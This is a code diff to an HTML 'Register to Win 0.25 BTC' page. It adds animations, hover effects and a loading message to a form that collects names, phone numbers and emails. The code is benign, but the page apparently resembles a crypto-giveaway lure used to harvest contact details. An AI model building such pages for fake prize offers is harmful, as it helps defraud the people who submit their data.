--- a/Index VS2.html
+++ b/Index VS2.html
@@ -3,6 +3,7 @@
 <head>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
+    <meta http-equiv="X-UA-Compatible" content="IE=edge">
     <title>Win 0.25 BTC Registration</title>
     <style>
         /* Global styles */
@@ -20,6 +21,65 @@
             justify-content: center;
             align-items: center;
             height: 100vh;
+            overflow: hidden;
+            position: relative;
+        }
+
+        /* Adding background animation */
+        .background-animation {
+            position: absolute;
+            width: 100%;
+            height: 100%;
+            top: 0;
+            left: 0;
+            z-index: -1;
+            overflow: hidden;
+        }
+
+        .background-animation div {
+            position: absolute;
+            display: block;
+            width: 20px;
+            height: 20px;
+            background: rgba(255, 255, 255, 0.1);
+            animation: float 20s infinite ease-in-out;
+            border-radius: 50%;
+        }
+
+        .background-animation div:nth-child(1) {
+            top: 10%;
+            left: 20%;
+            animation-duration: 18s;
+            width: 50px;
+            height: 50px;
+        }
+
+        .background-animation div:nth-child(2) {
+            top: 60%;
+            left: 70%;
+            animation-duration: 22s;
+            width: 30px;
+            height: 30px;
+        }
+
+        .background-animation div:nth-child(3) {
+            top: 80%;
+            left: 30%;
+            animation-duration: 15s;
+            width: 40px;
+            height: 40px;
+        }
+
+        @keyframes float {
+            0% {
+                transform: translateY(0) scale(1);
+            }
+            50% {
+                transform: translateY(-50px) scale(1.1);
+            }
+            100% {
+                transform: translateY(0) scale(1);
+            }
         }
 
         .container {
@@ -28,8 +88,20 @@
             width: 100%;
             padding: 30px;
             border-radius: 15px;
-            box-shadow: 0 15px 30px rgba(0, 0, 0, 0.1);
+            box-shadow: 0 20px 40px rgba(0, 0, 0, 0.15);
             text-align: center;
+            animation: popIn 1s ease-in-out;
+        }
+
+        @keyframes popIn {
+            0% {
+                transform: scale(0.7);
+                opacity: 0;
+            }
+            100% {
+                transform: scale(1);
+                opacity: 1;
+            }
         }
 
         h1 {
@@ -55,11 +127,12 @@
             font-size: 16px;
             border: 2px solid #ddd;
             border-radius: 8px;
-            transition: border-color 0.3s ease-in-out;
+            transition: border-color 0.3s ease-in-out, box-shadow 0.3s ease-in-out;
         }
 
         input:focus, textarea:focus {
             border-color: #4ca1af;
+            box-shadow: 0 0 10px rgba(76, 161, 175, 0.3);
             outline: none;
         }
 
@@ -76,11 +149,19 @@
             border: none;
             border-radius: 8px;
             cursor: pointer;
-            transition: background 0.3s ease-in-out;
+            transition: background 0.3s ease-in-out, transform 0.3s ease-in-out;
         }
 
         button:hover {
             background: linear-gradient(135deg, #2c3e50, #4ca1af);
+            transform: translateY(-3px);
+        }
+
+        /* Loading spinner */
+        #loading {
+            display: none;
+            margin-top: 10px;
+            color: #4ca1af;
         }
 
         /* Success Pop-up */
@@ -95,6 +176,7 @@
             box-shadow: 0 10px 20px rgba(0, 0, 0, 0.2);
             text-align: center;
             display: none;
+            animation: popIn 0.5s ease-in-out;
         }
 
         #success-popup h2 {
@@ -113,6 +195,7 @@
             border: none;
             border-radius: 5px;
             cursor: pointer;
+            transition: background 0.3s ease-in-out;
         }
 
         #close-popup:hover {
@@ -130,10 +213,16 @@
 </head>
 <body>
 
+    <div class="background-animation">
+        <div></div>
+        <div></div>
+        <div></div>
+    </div>
+
     <div class="container">
         <h1>Register to Win 0.25 BTC</h1>
         <p>Fill in the details below for a chance to win 0.25 BTC!</p>
-        <form id="registration-form" action="https://formspree.io/f/xdknvbop" method="POST">
+        <form id="registration-form">
             <input type="text" name="Full Name" placeholder="Full Name" required>
             <input type="tel" name="Phone" placeholder="Phone Number" required>
             <input type="email" name="Email" placeholder="Email Address" required>
@@ -141,6 +230,8 @@
             <textarea name="Message" placeholder="Why do you want to win?" required></textarea>
             <button type="submit">Submit</button>
         </form>
+        <!-- Loading spinner -->
+        <p id="loading">Submitting your registration...</p>
     </div>
 
     <!-- Success Pop-up -->
@@ -151,9 +242,11 @@
     </div>
 
     <script>
-        // Handle form submission via AJAX
         document.getElementById('registration-form').addEventListener('submit', function(event) {
-            event.preventDefault(); // Prevent the form from redirecting
+            event.preventDefault(); // Prevent form redirect
+
+            // Show the loading indicator immediately after form submission
+            document.getElementById('loading').style.display = 'block';
 
             // Capture the form data
             var formData = new FormData(this);
@@ -167,6 +260,8 @@
                 }
             })
             .then(function(response) {
+                document.getElementById('loading').style.display = 'none'; // Hide loading message
+
                 if (response.ok) {
                     // Show the success pop-up
                     document.getElementById('success-popup').style.display = 'block';
@@ -175,6 +270,7 @@
                 }
             })
             .catch(function(error) {
+                document.getElementById('loading').style.display = 'none'; // Hide loading message
                 alert('Error submitting the form: ' + error.message);
             });
         });
@@ -182,8 +278,7 @@
         // Handle closing the pop-up
         document.getElementById('close-popup').addEventListener('click', function() {
             document.getElementById('success-popup').style.display = 'none';
-            // Optionally, you can clear the form
-            document.getElementById('registration-form').reset();
+            document.getElementById('registration-form').reset(); // Optionally clear the form
         });
     </script>
 
